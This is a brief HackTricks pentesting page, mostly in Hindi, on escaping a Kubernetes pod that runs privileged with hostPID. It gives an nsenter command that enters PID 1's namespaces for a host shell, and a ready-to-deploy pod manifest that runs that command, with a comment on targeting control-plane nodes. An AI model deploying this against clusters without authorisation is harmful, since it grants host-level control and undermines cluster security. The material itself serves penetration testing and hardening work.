Pod Escape Privileges

Reading time: 2 minutes

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

Privileged and hostPID

इन विशेषाधिकारों के साथ, आपके पास होस्ट की प्रक्रियाओं तक पहुंच होगी और होस्ट प्रक्रियाओं में से एक के नामस्थान के अंदर प्रवेश करने के लिए पर्याप्त विशेषाधिकार होंगे।
ध्यान दें कि आपको संभावित रूप से विशेषाधिकार की आवश्यकता नहीं हो सकती है, बल्कि केवल कुछ क्षमताएँ और अन्य संभावित रक्षा बाईपास (जैसे apparmor और/या seccomp) की आवश्यकता हो सकती है।

बस निम्नलिखित में से कुछ चलाने से आपको पॉड से बाहर निकलने की अनुमति मिलेगी:

bash
nsenter --target 1 --mount --uts --ipc --net --pid -- bash

कॉन्फ़िगरेशन उदाहरण:

yaml
apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command:
[
"nsenter",
"--target",
"1",
"--mount",
"--uts",
"--ipc",
"--net",
"--pid",
"--",
"bash",
]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें